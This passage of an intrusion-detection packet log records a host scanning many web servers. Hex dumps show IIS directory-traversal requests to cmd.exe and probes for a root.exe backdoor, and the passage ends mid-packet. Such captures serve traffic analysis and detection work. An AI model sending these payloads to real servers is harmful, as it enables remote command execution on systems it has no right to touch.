*****R** Seq: 0x372D7F97  Ack: 0x372D7F97  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.855700 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4701 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:48935 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7F2A  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.857501 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4701 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:49191 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7F2B  Ack: 0xEE31714C  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.858068 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x9A
137.189.161.199:4701 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:49447 IpLen:20 DgmLen:140 DF
***AP*** Seq: 0x372D7F2B  Ack: 0xEE31714C  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
32 35 25 33 35 25 36 33 2E 2E 2F 77 69 6E 6E 74  25%35%63../winnt
2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78  /system32/cmd.ex
65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E  e?/c+dir HTTP/1.
30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F  0..Host: www..Co
6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65  nnnection: close
0D 0A 0D 0A                                      ....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.863418 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4701 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:49959 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7F8F  Ack: 0x0  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.863427 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4701 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:50215 IpLen:20 DgmLen:40
*****R** Seq: 0x372D7F8F  Ack: 0x372D7F8F  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.864381 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4703 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:50471 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7F46  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.866514 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4703 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:50727 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7F47  Ack: 0xEE32ABAA  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.866733 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x96
137.189.161.199:4703 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:50983 IpLen:20 DgmLen:136 DF
***AP*** Seq: 0x372D7F47  Ack: 0xEE32ABAA  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
32 35 32 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73  252f../winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A  ction: close....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.872106 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4703 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:52263 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7FA7  Ack: 0x28F0C61A  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.872243 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4703 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:52519 IpLen:20 DgmLen:40
*****R** Seq: 0x372D7FA7  Ack: 0x372D7FA7  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:19.442633 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:3187 -> 137.189.99.157:80 TCP TTL:125 TOS:0x0 ID:34625 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D9CD4  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:19.659884 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:3272 -> 137.189.98.37:80 TCP TTL:125 TOS:0x0 ID:22082 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D9E1F  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:20.064896 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:3334 -> 137.189.99.18:80 TCP TTL:125 TOS:0x0 ID:54082 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D9F45  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:29.675259 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2706 -> 137.189.97.199:80 TCP TTL:125 TOS:0x0 ID:43110 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372DC4E3  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:31.460295 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:3152 -> 137.189.97.223:80 TCP TTL:125 TOS:0x0 ID:22379 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372DCC18  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:32.077357 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:3373 -> 137.189.98.45:80 TCP TTL:125 TOS:0x0 ID:55917 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372DCE3B  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:33.122067 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:3534 -> 137.189.96.220:80 TCP TTL:125 TOS:0x0 ID:46191 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372DD25A  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:40.770666 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2359 -> 137.189.96.200:80 TCP TTL:125 TOS:0x0 ID:60045 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372DF024  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:43.221426 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2785 -> 137.189.99.75:80 TCP TTL:125 TOS:0x0 ID:7058 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372DF9BB  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:43.616241 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2866 -> 137.189.98.95:80 TCP TTL:125 TOS:0x0 ID:56466 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372DFB84  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:49.174018 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:1540 -> 137.189.97.139:80 TCP TTL:125 TOS:0x0 ID:46255 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372E10FD  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:49.739307 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:1711 -> 137.189.96.206:80 TCP TTL:125 TOS:0x0 ID:25777 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372E134B  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:50.330376 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:1811 -> 137.189.99.7:80 TCP TTL:125 TOS:0x0 ID:25266 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372E159F  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.065101 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2016 -> 137.189.99.104:80 TCP TTL:125 TOS:0x0 ID:42420 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372E1802  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.283826 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2087 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:27829 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372E1938  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.285629 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2087 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:28853 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E1939  Ack: 0x31926B32  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.285768 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x7E
137.189.161.199:2087 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:29365 IpLen:20 DgmLen:112 DF
***AP*** Seq: 0x372E1939  Ack: 0x31926B32  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 72 6F 6F  GET /scripts/roo
74 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54  t.exe?/c+dir HTT
50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77  P/1.0..Host: www
0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63  ..Connnection: c
6C 6F 73 65 0D 0A 0D 0A                          lose....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.288700 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2087 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:29877 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E1981  Ack: 0x31926D01  Win: 0xAA32  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.288868 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2087 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:30133 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372E1981  Ack: 0x31926D01  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.292633 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2094 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:30645 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372E193E  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.294109 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2094 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:31925 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E193F  Ack: 0x31EE3BF9  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.294287 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x7C
137.189.161.199:2094 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:32181 IpLen:20 DgmLen:110 DF
***AP*** Seq: 0x372E193F  Ack: 0x31EE3BF9  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 4D 53 41 44 43 2F 72 6F 6F 74 2E  GET /MSADC/root.
65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F  exe?/c+dir HTTP/
31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A  1.0..Host: www..
43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F  Connnection: clo
73 65 0D 0A 0D 0A                                se....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.296894 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2094 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:33461 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E1985  Ack: 0x31EE3DC6  Win: 0xAA34  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.297388 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2094 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:33717 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372E1985  Ack: 0x31EE3DC6  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.298699 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2097 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:33973 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372E1947  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.300664 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2097 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:34485 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E1948  Ack: 0x31D75CBE  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.300686 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x86
137.189.161.199:2097 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:34741 IpLen:20 DgmLen:120 DF
***AP*** Seq: 0x372E1948  Ack: 0x31D75CBE  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 63 2F 77 69 6E 6E 74 2F 73 79 73  GET /c/winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A  ction: close....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.305455 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2097 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:35509 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E1998  Ack: 0x31D75E95  Win: 0xAA2A  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.305579 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2097 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:35765 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372E1998  Ack: 0x31D75E95  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.305742 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2101 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:36533 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372E1947  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.307092 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2101 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:37045 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E1948  Ack: 0x31FA19C9  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.307398 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x86
137.189.161.199:2101 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:37557 IpLen:20 DgmLen:120 DF
***AP*** Seq: 0x372E1948  Ack: 0x31FA19C9  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73  GET /d/winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A  ction: close....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.310494 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2101 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:38325 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E1998  Ack: 0x31FA1BA0  Win: 0xAA2A  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.310495 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2101 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:38581 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372E1998  Ack: 0x31FA19C9  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.311477 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2102 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:38837 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372E1947  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.313116 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2102 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:39349 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E1948  Ack: 0x31E00F0C  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.313790 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x96
137.189.161.199:2102 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:39605 IpLen:20 DgmLen:136 DF
***AP*** Seq: 0x372E1948  Ack: 0x31E00F0C  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
32 35 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73  255c../winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A  ction: close....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.319218 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2102 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:40373 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E19A8  Ack: 0x31E010F1  Win: 0xAA1C  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.319340 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2102 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:40629 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372E19A8  Ack: 0x31E010F1  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.319668 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2106 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:41141 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372E1957  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.321676 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2106 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:42677 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E1958  Ack: 0x31FEC22D  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.321822 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0xAB
137.189.161.199:2106 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:42933 IpLen:20 DgmLen:157 DF
***AP*** Seq: 0x372E1958  Ack: 0x31FEC22D  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E  GET /_vti_bin/..
25 32 35 35 63 2E 2E 2F 2E 2E 25 32 35 35 63 2E  %255c../..%255c.
